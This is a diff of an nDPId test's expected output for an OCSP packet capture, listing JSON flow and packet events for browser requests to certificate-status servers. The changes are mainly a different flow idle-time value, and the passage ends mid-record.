00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-data-len":8359,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1623222699655} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} -00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} -00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} +00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222785875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785875,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGxC5cel\/rwKgBgABQqtACFmIrx0ULW6AScSDxGwAAAgQFtAQCCAqrs6x4tFZ4oAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8kYB7"} +00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222785879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222785879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0JGJAAEAGl9TAqAGAXHpf66rQAFDHRQtbAhZiLIAQAfaPAgAAAQEICrRWeLCrs6x4GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcxJlyw=="} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222785863,"flow_last_seen":1623222785879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623222785879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": 